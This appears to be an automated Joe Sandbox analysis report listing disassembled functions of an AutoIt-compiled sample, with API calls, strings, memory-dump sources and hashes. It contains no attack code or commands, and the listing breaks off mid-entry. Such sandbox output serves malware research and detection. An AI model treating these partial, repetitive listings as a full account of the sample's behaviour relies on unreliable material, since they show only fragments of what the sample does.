Opcode ID: 52a29c3c8c8fb87bb975ea673bba4973c26538965fcdcab93ac545f02bd4088a
Instruction ID: b2a966eb1ebea23100fef80d1a422a77d00540de159fff24a52516e4bad91e93
Opcode Fuzzy Hash: 52a29c3c8c8fb87bb975ea673bba4973c26538965fcdcab93ac545f02bd4088a
Instruction Fuzzy Hash: 99C169B1D0421DAADF21DFA5CC81EEEB7BCAF54310F0040AAF608E7151EB749A459F61

Function 00F93015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F93074
RegisterClassExW.USER32(00000030), ref: 00F9309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F930AF
InitCommonControlsEx.COMCTL32(?), ref: 00F930CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F930DC
LoadIconW.USER32(000000A9), ref: 00F930F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F93101

Strings

+, xrefs: 00F9305D
AutoIt v3 GUI, xrefs: 00F93090
0, xrefs: 00F93056
TaskbarCreated, xrefs: 00F930A4

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: ed605c83b456fc1e3b1208d25dca88508e935b2afe32f5325cb4b0e635f8290f
Instruction ID: 8e26f285a899e30f1e74886049e5ae91f2203dade0113102529e1084d060ab34
Opcode Fuzzy Hash: ed605c83b456fc1e3b1208d25dca88508e935b2afe32f5325cb4b0e635f8290f
Instruction Fuzzy Hash: 733107B184534AAFDB61CFA4E889A9ABBF0FB09310F14455EE5C0E6294D3BE0589CF51

Function 00F93041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F93074
RegisterClassExW.USER32(00000030), ref: 00F9309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F930AF
InitCommonControlsEx.COMCTL32(?), ref: 00F930CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F930DC
LoadIconW.USER32(000000A9), ref: 00F930F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F93101

Strings

+, xrefs: 00F9305D
AutoIt v3 GUI, xrefs: 00F93090
0, xrefs: 00F93056
TaskbarCreated, xrefs: 00F930A4

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 73efc179c385cddc7211066d80042f0e20abd5f892c59b9238a6cf0f24380943
Instruction ID: f38b47b9c5e0f35d7fb370fc7ddbfcded7f0d884c13e8588b4231ce357514a01
Opcode Fuzzy Hash: 73efc179c385cddc7211066d80042f0e20abd5f892c59b9238a6cf0f24380943
Instruction Fuzzy Hash: 2021C4B1D11319AFDB20DFA4E889B9EBBF4FB08710F00411AF990E6294D7BA45488F91

Function 00F9708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F94706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010552F8,?,00F937AE,?), ref: 00F94724

Part of subcall function 00FB050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F97165), ref: 00FB052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F971A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FCE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FCE909
RegCloseKey.ADVAPI32(?), ref: 00FCE947
_wcscat.LIBCMT ref: 00FCE9A0

Strings

Include, xrefs: 00FCE8BF, 00FCE900
\Include\, xrefs: 00F97165
Software\AutoIt v3\AutoIt, xrefs: 00F9719E
\, xrefs: 00FCE9C3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 8a57c3cf4345f7ca81abbc2c856476e4a6c119be560d140f55245ba5c1644658
Instruction ID: a5b5f805bf7d3fd9be17a8108048a393e269eab75d3736724461ea8843e6b63d
Opcode Fuzzy Hash: 8a57c3cf4345f7ca81abbc2c856476e4a6c119be560d140f55245ba5c1644658
Instruction Fuzzy Hash: 53718F715087029ED714EF65E8429AFBBF8FF84390F80052EF485871A4DB7AD948DB52

Function 00F93A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F93A50
LoadCursorW.USER32(00000000,00007F00), ref: 00F93A5F
LoadIconW.USER32(00000063), ref: 00F93A76
LoadIconW.USER32(000000A4), ref: 00F93A88
LoadIconW.USER32(000000A2), ref: 00F93A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F93AC0
RegisterClassExW.USER32(?), ref: 00F93B16

Part of subcall function 00F93041: GetSysColorBrush.USER32(0000000F), ref: 00F93074
Part of subcall function 00F93041: RegisterClassExW.USER32(00000030), ref: 00F9309E
Part of subcall function 00F93041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F930AF
Part of subcall function 00F93041: InitCommonControlsEx.COMCTL32(?), ref: 00F930CC
Part of subcall function 00F93041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F930DC
Part of subcall function 00F93041: LoadIconW.USER32(000000A9), ref: 00F930F2
Part of subcall function 00F93041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F93101

Strings

0, xrefs: 00F93AF4
#, xrefs: 00F93AFB
AutoIt v3, xrefs: 00F93B05

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e51b7560b27c6f48be57188d8178da3b73c194789b2e4ac2632c2cab6517ff03
Instruction ID: 39996e3e4c69c7bf8ba5c8b6cf17250215ce84c1fcb1a05007d7279c8b59956b
Opcode Fuzzy Hash: e51b7560b27c6f48be57188d8178da3b73c194789b2e4ac2632c2cab6517ff03
Instruction Fuzzy Hash: 9F214471D10309AFEF20DFA4EC09B9E7BB1FB09751F00011AF584AA295D3BE6A449F94

Function 00F93633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00F936D2
KillTimer.USER32(?,00000001), ref: 00F936FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F9371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F9372A
CreatePopupMenu.USER32 ref: 00F9373E
PostQuitMessage.USER32(00000000), ref: 00F9374D

Strings

TaskbarCreated, xrefs: 00F93725

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: bdf0f18d0ca538591d69a7a77e4a7d0dfcaa6b26449775535e6a3e3bb7cdb350
Instruction ID: 71bfba9b51534359432ec80dc1cd930299fafbea60ac2ecec079166467d8fb2c
Opcode Fuzzy Hash: bdf0f18d0ca538591d69a7a77e4a7d0dfcaa6b26449775535e6a3e3bb7cdb350
Instruction Fuzzy Hash: C8414AB2604206BBFF345FA8DC09F7E3765FB01310F140129FA82D6295CA6EAD05B762

Function 00F93766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINERAW, xrefs: 00F937FB
CMDLINE, xrefs: 00F93822
/ErrorStdOut, xrefs: 00F9387D
/AutoIt3ExecuteScript, xrefs: 00F938BC
/AutoIt3OutputDebug, xrefs: 00F93892
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00F937AE
/AutoIt3ExecuteLine, xrefs: 00F938A7

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 0ce93c7bed7bd1bd359b98591498a78c4ec22b5ca79d930c6714554ac37a71cf
Instruction ID: 248e886cbbd118de1d2c7bcc51c456e7b987f748e134dc61f321f6a56c18df9e
Opcode Fuzzy Hash: 0ce93c7bed7bd1bd359b98591498a78c4ec22b5ca79d930c6714554ac37a71cf
Instruction Fuzzy Hash: 9EA18F72D1021D9AEF04EBA4DC92EEEB779BF15310F440019F415A7151EF789A08EB60

Function 00CC7520 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00CC7565

Memory Dump Source

Source File: 00000000.00000002.1454627695.0000000000CC6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CC6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc6000_7b4Iaf58Rp.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: e8ebf32bc9cd23694cd2c405fdfcc68969f9711f19fa1d718890ffe2de29dba4
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: CE510B75A54208FBEF20DFA4CC49FDE7778EF48700F108658F619EA180DA749A459B64

Function 00F939D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F93A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F93A24
ShowWindow.USER32(00000000,?,?), ref: 00F93A38
ShowWindow.USER32(00000000,?,?), ref: 00F93A41

Strings

edit, xrefs: 00F93A1E
AutoIt v3, xrefs: 00F939FB, 00F93A00, 00F93A01

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 3ac7860cf795edc8973a913d4b603836732f831857fb6f675f205de166be0730
Instruction ID: fcea4a2ef54d7b8928390c3c35ece643600ceeec6804029146a3ad20e52306f1
Opcode Fuzzy Hash: 3ac7860cf795edc8973a913d4b603836732f831857fb6f675f205de166be0730
Instruction Fuzzy Hash: 4EF03A715403907EEB315623AC08E2B2E7DE7CBF90B00001EB944E2158C2AE1800CBB0

Function 00F9407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FCD3D7

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

_memset.LIBCMT ref: 00F940FC
_wcscpy.LIBCMT ref: 00F94150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F94160

Strings

Line: , xrefs: 00FCD400

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: e0fcf9649b8c679f80976899b09c55e547f00ef36bd200ed7159dc55729b5b6c
Instruction ID: e94945a4e4e8dec754885950e9b9b08e0a51cf328d8cc26254e1b8b31d7afe16
Opcode Fuzzy Hash: e0fcf9649b8c679f80976899b09c55e547f00ef36bd200ed7159dc55729b5b6c
Instruction Fuzzy Hash: 6A31F171408301AFEB72EB60DC46FDB77E8AF94314F10491EF5C592091EB78A649DB86

Function 00FB541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00FB547B
_memcpy_s.LIBCMT ref: 00FB54ED
__read_nolock.LIBCMT ref: 00FB554B
__filbuf.LIBCMT ref: 00FB556E
_memset.LIBCMT ref: 00FB55B2

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: a8d1dcfacff91787810436db769749d68de6f413b12b8ebd2f461e0e8ab3d859
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: DB51D771E00B05DBCB24DEAADC407EE77A6AF40B35F288729F825962D0D7789D51AF40

Function 00F9686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F94DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F94E0F

_free.LIBCMT ref: 00FCE263
_free.LIBCMT ref: 00FCE2AA

Part of subcall function 00F96A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F96BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00FCE039
Bad directive syntax error, xrefs: 00FCE292

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 47c51ec255e8053602603d24b587fc17ec464f1a26fca72b14edcb5e257d8193
Instruction ID: da3c6c3169a2bdfe0e24a4f0c2d719162983f19cef683765af0dbc6c57682fe4
Opcode Fuzzy Hash: 47c51ec255e8053602603d24b587fc17ec464f1a26fca72b14edcb5e257d8193
Instruction Fuzzy Hash: 9F917F71D1421AAFDF04EFA4CC82AEDB7B4FF14310B14442EF815AB2A1DB78A915EB50

Function 00CC8FC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC8EB0: Sleep.KERNELBASE(000001F4), ref: 00CC8EC1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00CC90C3

Strings

7KE9ZU9FD81Z5, xrefs: 00CC9143, 00CC9146

Memory Dump Source

Source File: 00000000.00000002.1454627695.0000000000CC6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CC6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc6000_7b4Iaf58Rp.jbxd

Similarity

API ID: CreateFileSleep
String ID: 7KE9ZU9FD81Z5
API String ID: 2694422964-2996063603
Opcode ID: 07855ff5b6431ef8294a0ec90372ec276a17318cf92d224bfd382c2cf86e8aec
Instruction ID: 649c1c5af560fcc49c9a0a94187034bb40e515c31042176db4314aedf51fa10a
Opcode Fuzzy Hash: 07855ff5b6431ef8294a0ec90372ec276a17318cf92d224bfd382c2cf86e8aec
Instruction Fuzzy Hash: EB518031E04249DAEF11DBA4C809BEFBB79EF49300F104199E608BB2C0DB791B45DBA5

Function 00F935B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F935A1,SwapMouseButtons,00000004,?), ref: 00F935D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F935A1,SwapMouseButtons,00000004,?,?,?,?,00F92754), ref: 00F935F5
RegCloseKey.KERNELBASE(00000000,?,?,00F935A1,SwapMouseButtons,00000004,?,?,?,?,00F92754), ref: 00F93617

Strings

Control Panel\Mouse, xrefs: 00F935D2

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 948a8f1f7ed899bc5172cd81e95f5a3c35f8f8a9f57f8b7a57ff7ab292d7e5e4
Instruction ID: a616b7d14dea52aa66eb175a01fd702a99dae6a909f8b43c19398f6d2f2ad6d5
Opcode Fuzzy Hash: 948a8f1f7ed899bc5172cd81e95f5a3c35f8f8a9f57f8b7a57ff7ab292d7e5e4
Instruction Fuzzy Hash: 57115A71910208BFEF21CFA8D844EAFBBB8EF04750F004459F805D7200D2719F44A760

Function 00FF955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00F94EE5: _fseek.LIBCMT ref: 00F94EFD

Part of subcall function 00FF9734: _wcscmp.LIBCMT ref: 00FF9824
Part of subcall function 00FF9734: _wcscmp.LIBCMT ref: 00FF9837

_free.LIBCMT ref: 00FF96A2
_free.LIBCMT ref: 00FF96A9
_free.LIBCMT ref: 00FF9714

Part of subcall function 00FB2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FB9A24), ref: 00FB2D69
Part of subcall function 00FB2D55: GetLastError.KERNEL32(00000000,?,00FB9A24), ref: 00FB2D7B

_free.LIBCMT ref: 00FF971C

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 4a2872fe10592e1d84cc1262fcb1ccf713934ef89923d88bffb920594bd4d040
Instruction ID: 04be443e3469fe980d2bb4e06cf99893a8860a54e3f092c4316823fa730f047b
Opcode Fuzzy Hash: 4a2872fe10592e1d84cc1262fcb1ccf713934ef89923d88bffb920594bd4d040
Instruction Fuzzy Hash: 0A516DB1D04218AFDF249F65CC81BAEBBB9EF48300F1004AEF609A3251DB755A81DF58

Function 00FB470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FB47A0
__flush.LIBCMT ref: 00FB47C0
__write.LIBCMT ref: 00FB47F3
__flsbuf.LIBCMT ref: 00FB4821

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 7a5180d1d07a99f8f3cd533284b0a497c19de56af684d83b400d185ebdcf0d48
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 2C41E535E007469BDB18CE6BCA809EE77A5EF46360B20813DE815C7642DB34ED41EF40

Function 00F944A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F944CF

Part of subcall function 00F9407C: _memset.LIBCMT ref: 00F940FC
Part of subcall function 00F9407C: _wcscpy.LIBCMT ref: 00F94150
Part of subcall function 00F9407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F94160

KillTimer.USER32(?,00000001,?,?), ref: 00F94524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F94533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FCD4B9

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

